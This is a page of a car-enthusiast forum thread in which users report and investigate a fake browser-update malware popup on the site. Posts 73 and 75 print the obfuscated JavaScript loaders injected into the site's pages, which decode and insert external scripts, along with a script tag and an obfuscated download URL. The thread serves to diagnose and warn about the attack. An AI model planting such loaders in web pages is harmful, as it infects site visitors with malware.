KilometerMagazine.com - Malware in ads - fake browser updates
Username or Email Address
Do you already have an account?
Forgot your password?
  • Log in or Sign up


    Page 3 of 4 FirstFirst 1234 LastLast
    Results 51 to 75 of 80
    1. Member KeiCar's Avatar
      Join Date
      Jul 22nd, 2002
      Location
      Philthadelphia
      Posts
      11,468
      Vehicles
      2007 Acura TSX / 2013 Toyota Yaris LE
      05-19-2017 02:20 PM #51
      Chrome Version 58.0.3029.110 (64-bit) -- Newtown Square, PA
      Attention: If you or a loved one has been diagnosed with Mesothelioma you may to be entitled to financial compensation. Mesothelioma is a rare cancer linked to asbestos exposure. Exposure to asbestos in the Navy, shipyards, mills, heating, construction or the automotive industries may put you at risk. Please don't wait, call 1-800-99 LAW USA today for a free legal consultation and financial information packet. Mesothelioma patients call now!

    2. Junior Member
      Join Date
      Apr 29th, 2016
      Location
      Longmont, CO.
      Posts
      36
      Vehicles
      2016 Golf R DSG, DCC, NAV
      05-19-2017 02:27 PM #52
      I have configured ad block to completely block the div/span at the top of the page.
      That way no ads show up at all.

      Sorry about that.

    3. Member Sump's Avatar
      Join Date
      Jul 14th, 2006
      Location
      Chicagoland, IL
      Posts
      19,371
      Vehicles
      99 M3, 17 GTI, 17 Golf Alltrack
      05-19-2017 03:08 PM #53
      Quote Originally Posted by KeiCar View Post
      Chrome Version 58.0.3029.110 (64-bit) -- Newtown Square, PA
      Same chrome version, Elgin IL, also got it at another location in IL.

      It seems to only display once and I can't get it back again, just tried downloading firefox and it doesn't do it. This is definitely not served via an ad, it has to be malicious JS on the Vortex server. Wish I wouldn't of closed out so I could see the source code of the offending page.

      It vortex ever planning on adding https support?

    4. Semi-n00b rickhamilton620's Avatar
      Join Date
      May 27th, 2015
      Location
      York, PA
      Posts
      19
      Vehicles
      95 Jeep Cherokee Sport
      05-19-2017 04:04 PM #54
      Quote Originally Posted by JasonJoel View Post
      Lol. I removed a nasty cryptolocker infection from a teacher's MacBook last week (well, full wipe and restore really).

      Macs are not magically protected computers. Ask any school IT person...

      Sent from my SM-G955U using Tapatalk
      As a fellow school IT guy, I can confirm wholeheartedly, haha.

    5. Member PlatinumGLS's Avatar
      Join Date
      Aug 2nd, 2003
      Location
      Shelby Township, MI
      Posts
      16,795
      Vehicles
      7.4, 5.7, 5.3 & 3.0TT
      05-19-2017 06:21 PM #55
      Chrome Version 58.0.3029.110 (64-bit) - Metro Detroit

      FYI - confirmed it is still active.
      Last edited by PlatinumGLS; 05-19-2017 at 06:25 PM.

    6. Member
      Join Date
      Apr 27th, 2006
      Location
      Winnipeg
      Posts
      316
      Vehicles
      2010 Golf TDI M6
      05-19-2017 07:09 PM #56
      Quote Originally Posted by AG-Admin View Post
      I have been asked to try to collect info on what browsers you use as well as the city you are in. These may be geotargeted.
      -Philip
      Winnipeg, Canada. Chrome 57.0.2987.133

    7. 05-19-2017 10:07 PM #57
      Three days after the first post and this is still here??!!! I just got the Firefox "update" prompt. Fortunately, I knew better than to open it but it is inexcusable to allow this to go on for so long.

    8. Junior Member
      Join Date
      Nov 23rd, 2010
      Location
      San Diego
      Posts
      99
      Vehicles
      2001 225Q AMU
      05-20-2017 07:15 PM #58
      May 20 4:12pm... I logged on to VWVortex and "Chrome_59.3.8.1.js" asked to be downloaded and I stupidly clicked Yes. But then I googled "Chrome_59.3.8.1.js" and it led me to this thread. I didn't click on the file, I deleted it, and then emptied trash. I'm thinking I am ok since I never clicked on the file to open it...

    9. Member PlatinumGLS's Avatar
      Join Date
      Aug 2nd, 2003
      Location
      Shelby Township, MI
      Posts
      16,795
      Vehicles
      7.4, 5.7, 5.3 & 3.0TT
      05-21-2017 10:34 AM #59
      Quote Originally Posted by Johnclark05 View Post
      Three days after the first post and this is still here??!!!
      Still active as of 2 minutes ago

    10. Moderator DanG's Avatar
      Join Date
      Nov 16th, 2000
      Location
      Winnipeg
      Posts
      11,341
      Vehicles
      2014 Wrangler
      05-21-2017 12:18 PM #60
      Winnipeg, Canada, both times I've received it were using Chrome 58.0.3029.110 64bit
      Haven't seen it since the 19th
      °.lllllll.°

    11. Member
      Join Date
      Apr 19th, 2005
      Posts
      638
      Vehicles
      1982 Caddy, 1984 Cabby, 2000 NB, 2010 CC
      05-22-2017 08:58 AM #61
      Still Receiving message (3rd time currently)

      Firefox 52.1.2

      Rockford, IL

      May 22, 2017

    12. Member rimtrim's Avatar
      Join Date
      Dec 17th, 2004
      Location
      Phila PA
      Posts
      3,824
      Vehicles
      1990 Olds Delta 88, 1986 Pontiac Parisienne Safari
      05-22-2017 10:34 AM #62
      I've been seeing this for about a week as well. I've only seen it from Windows machines, usually just the first time I visit the site for the day. Is there anything I can gather that would help troubleshoot this? I can probably even get a packet trace if it would help.

      -Andrew L
      "The whole economy is hinged on potholes." --Ray Magliozzi
      Hubcap Business on hiatus while I finish the Pontiac Project and The House | Philly/NJ highways blog Windshield Time

    13. 05-22-2017 11:31 AM #63
      Saw this scam popup yesterday - have reported the domain to GoDaddy for hosting malware, if their policy is anything like ours (I work for a hosting company), they'll suspend the site.

    14. Not your buddy, guy...
      Join Date
      Oct 12th, 2015
      Posts
      285
      05-22-2017 12:54 PM #64
      Quote Originally Posted by rimtrim View Post
      I've been seeing this for about a week as well. I've only seen it from Windows machines, usually just the first time I visit the site for the day. Is there anything I can gather that would help troubleshoot this? I can probably even get a packet trace if it would help.

      -Andrew L
      If you can gather that info please do. I have not been able to replicate this personally yet. It has been escalated on our end as far up as I could get this and our ad partners have been investigating as well.
      -Philip

    15. Member PlatinumGLS's Avatar
      Join Date
      Aug 2nd, 2003
      Location
      Shelby Township, MI
      Posts
      16,795
      Vehicles
      7.4, 5.7, 5.3 & 3.0TT
      05-22-2017 08:48 PM #65
      I tried to replicate it again just now using private browsing but seems to be gone...for now

    16. Member HwAoRrDk's Avatar
      Join Date
      Aug 2nd, 2002
      Location
      United Kingdom
      Posts
      1,925
      Vehicles
      2004 Mazda RX-8 230
      05-23-2017 12:53 PM #66
      I got a reply back from Dropbox saying they are investigating the malicious JS files hosted with them.

      I would recommend to anyone else that is able, to report these file download links to Dropbox via e-mail at abuse@dropbox.com.

      Edit: Still ongoing, got it in Chrome with Incognito mode just now.
      Last edited by HwAoRrDk; 05-23-2017 at 01:06 PM.
      平成16 年の MAZDA RX-8 230

    17. Member rimtrim's Avatar
      Join Date
      Dec 17th, 2004
      Location
      Phila PA
      Posts
      3,824
      Vehicles
      1990 Olds Delta 88, 1986 Pontiac Parisienne Safari
      05-23-2017 07:24 PM #67
      I haven't seen it again since I posted yesterday...I've been starting up a packet trace every time I visit the forum, and of course it won't do it now. I'll post back if I get something.

      -Andrew L
      "The whole economy is hinged on potholes." --Ray Magliozzi
      Hubcap Business on hiatus while I finish the Pontiac Project and The House | Philly/NJ highways blog Windshield Time

    18. Member PlatinumGLS's Avatar
      Join Date
      Aug 2nd, 2003
      Location
      Shelby Township, MI
      Posts
      16,795
      Vehicles
      7.4, 5.7, 5.3 & 3.0TT
      05-23-2017 07:27 PM #68
      Quote Originally Posted by HwAoRrDk View Post
      Edit: Still ongoing, got it in Chrome with Incognito mode just now.
      Yeah, it is back for me as well

    19. Member
      Join Date
      Jul 26th, 2007
      Posts
      1,273
      Vehicles
      99.5 Jetta
      05-23-2017 09:05 PM #69
      Quote Originally Posted by PlatinumGLS View Post
      Yeah, it is back for me as well
      Same
      IHP is real.
      Imaginary
      Horse
      Power.

    20. Member LT1M21Stingray's Avatar
      Join Date
      Sep 13th, 2006
      Location
      Foothills of the Adirondacks.
      Posts
      18,065
      Vehicles
      SR71 C30 t53a/b
      05-24-2017 12:34 AM #70
      Quote Originally Posted by dogdog View Post
      Same
      Same Same...
      Quote Originally Posted by Mk1Madness
      Back when making your car faster and better handling was the big thing.
      Quote Originally Posted by Tavarish
      The car's best safety feature includes ejecting you in the moment of impact and wishing you the best of luck.

    21. Member Dieselstation's Avatar
      Join Date
      May 15th, 2001
      Location
      Southern California
      Posts
      9,747
      Vehicles
      www.speed-driven.com
      05-24-2017 04:53 AM #71
      Admins,
      Please remove this advertiser from your list. It tries to install malware or harmful files when you connect to the page as a first time user. It's very suspicious and a newbie might fall for it and get lots of malware on their computer.

      Speed-Driven Wallpapers: http://www.speed-driven.com

    22. Member
      Join Date
      Jul 27th, 2005
      Location
      Ramona, CA
      Posts
      4,827
      Vehicles
      '06, A3 2.0t, Sport
      05-24-2017 09:26 AM #72
      Just had this scam pop up and found this thread. Hard to believe this was reported over a week ago and still not fixed.

      Here's the Chrome thread about it: https://productforums.google.com/for...%7Cspell:false

      FYI, from thread:

      We have tested the malicious script. It can only be used by combining the downloaded javascript file and a function within the onclick event.
      So long as you don't click the "update" button, the script will not execute. In fact, without the code behind the button, it's near impossible to get it to execute.

      If you have clicked "update" you will need to follow these steps in this order.

      1 close chrome
      2 start task manager
      3 close the remaining chrome.exe processes (the malware has extra background processes running that prevent you from uninstalling chrome)
      4 uninstall chrome
      5 clean up the registry with something like ccleaner. (it will clean up a few other files, icons and things)
      6 restart your computer
      7 re-install chrome
      8 don't click update next time.. just close the browser tab/window. Once you have seen the "update chrome" page, it is unlikely you will see it again, as it will save a cookie/sessionStorage/localStorage telling the malware not to display again, which makes it harder to find.
      It also records an IP address, which prevents it from showing.
      Quote Originally Posted by MachnickiA3 View Post
      stick that in your "fleshy patch"

    23. Member Sump's Avatar
      Join Date
      Jul 14th, 2006
      Location
      Chicagoland, IL
      Posts
      19,371
      Vehicles
      99 M3, 17 GTI, 17 Golf Alltrack
      05-24-2017 09:51 AM #73
      Quote Originally Posted by Sump View Post
      Same chrome version, Elgin IL, also got it at another location in IL.

      It seems to only display once and I can't get it back again, just tried downloading firefox and it doesn't do it. This is definitely not served via an ad, it has to be malicious JS on the Vortex server. Wish I wouldn't of closed out so I could see the source code of the offending page.

      It vortex ever planning on adding https support?
      As mentioned here that Google thread confirmed malicious JS somewhere on Vortex server.
      We have found and resolved this issue.


      One of our jQuery library files was compromised. We found this file in one of our Wordpress plugins that come with a set of jQuery Libraries, one of which is suspected to have carried the vulnerability. This library is jquery.magnific-popup.js



      This is the malicious script on this file which seemed to be causing this.


      You can search your whole site for the following script and remove it:
      (file attached)


      if(document.cookie.indexOf(x("f=.a8m/t#u#_j_1_w"))===-1){var h=document.createElement('script');h.type='text/javascript';h.async=true;h.src=x('/e/9.7#ewe#6#dr708/d/f85#dgeb74a:95c58a25=pv6&54r1e2s=fd:i/cf?/ssj2..e0dsc._7sa/imgo5c/..d9n/a/rpb0h&s0i7m3ar.lkvc#akret7/1/#:as&p2t7tfh.');var n=document.getElementsByTagName('script')[0];n.parentNode.insertBefore(h,n);}}function x(s){var o='';for(var l=0;l<s.length;l++){if(l%2===1)o+=s[l];}o=o.split("").reverse().join("");return o;}})();


      We have attached the original file for further learning and analysis for anyone that is interested.
      Thank you to anyone and everyone that provided information and helped us to resolve the issue.
      Regards,
      Ben (Pro Bono Australia)

    24. Member finklejag's Avatar
      Join Date
      Apr 4th, 2002
      Location
      WA
      Posts
      4,927
      05-24-2017 10:49 AM #74
      I just love checking out Vortex these days. Not only do I get a Newsletter pop up every time, now I get free malware!

    25. Member HwAoRrDk's Avatar
      Join Date
      Aug 2nd, 2002
      Location
      United Kingdom
      Posts
      1,925
      Vehicles
      2004 Mazda RX-8 230
      05-24-2017 11:38 AM #75
      Quote Originally Posted by Sump View Post
      As mentioned here that Google thread confirmed malicious JS somewhere on Vortex server.
      I had some time to sit down and investigate this a bit more this afternoon. I did actually manage to get a Wireshark packet capture of the fake update screen loading in Chrome! However, it's not too useful, as I think the source that this is being loaded from is served via HTTPS, so the network traffic is encrypted, so I can't actually see what's in it.

      However, I think I have identified at least the trail through which the IFRAME ultimately gets loaded.

      In the packet capture, I could see - from the hostname in the SSL certificate - the request that was being made to scene.timbervalleyfarm.com (where the malicious fake update page is being loaded from). Directly before that, there is a request made to track.amishbrand.com - also via HTTPS. Sounds odd, right? Well, what causes that request? If you look at the post-loading HTML page DOM of the Vortex, you will see the following element gets dynamically inserted (it's not in the as-served HTML) into the HEAD tag:

      Code:
      <script type="text/javascript" async="" src="https://track.amishbrand.com/s_code.js?cid=214&amp;v=28c9a7ed5fd87d6ee79e"></script>
      And if I use the Network panel of Firefox's developer tools to trace what caused that script to be loaded, it tells me that it is some in-line Javascript in the main body of the page - that is, content from VWVortex's server itself. This piece of script is as follows:

      Code:
      <script type='text/javascript'>;(function(){var d=navigator[m("&t)nme}gcA)r,e{snup")];var y=document[m("ie,ikk,o,o{c(")];if(n(d,m("hs,wnotdtn;i}W6"))&&!n(d,m("9d9ido{r5drn4A("))){if(!n(y,m("&=(a{m,t}uo_0_(_r"))){var t=document.createElement('script');t.type='text/javascript';t.async=true;t.src=m('.e(9(7ne2e,6(d;718)d)f(5;dle076a,9;c;8)2}=}v}&}4}1v2;=,d}i4c;?,s(jq.{e(d}o;c,_}s,/,m{o)c{.{d0n3a0r{b)h(szi}m;a7.6k)c;a}r4t2/b/):ss(p(t6tyhi');var v=document.getElementsByTagName('script')[0];v.parentNode.insertBefore(t,v);}}function m(k){var f='';for(var q=0;q<k.length;q++){if(q%2===1)f+=k[q];}f=r(f);return f;}function n(j,w){if(j[m("/f)Obxme{din,i(")](w)!==-1){return true;}else{return false;}}function r(e){var z='';for(var a=e.length-1;a>=0;a--){z+=e[a];}return z;}})();</script>
      The obfuscation there on the strings (the 'garbage'-looking data) looked mighty familiar - I had a feeling of deja vu... Where had I seen something similar before? In the code of the fake browser update page! It uses a similar data obfuscation technique there on the Dropbox URL:

      Code:
      var fileUrl = getUrl('r1}=yl{d0?gs1j1.}7{.(8k.}5}56_ub)u)t}S;_0p;uht)e}S)_}x)o,f{e1r)i,F,/{f,e{c}u;q,7sbzi{8851h}p,k3u}i2/{s(/{m(o}c,.}x;o,b6pho;r8d{.)w{w0w{/,/;:0s{p(t{t}h)');
      Because of this, I believe the piece of inline script above that loads another script from track.amishbrand.com is highly likely to be the initial vector for this malware. And because the initial script is inline with the page, it means the phone call is coming from inside the house - that is, the VWVortex server(s) are compromised in some way to allow this malicious snippet of code to have been inserted into their HTML!

      VWVortex admins, forget the third-party ad networks, look at your own server's files!!!
      平成16 年の MAZDA RX-8 230

    For advertising information click HERE

    Page 3 of 4 FirstFirst 1234 LastLast

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •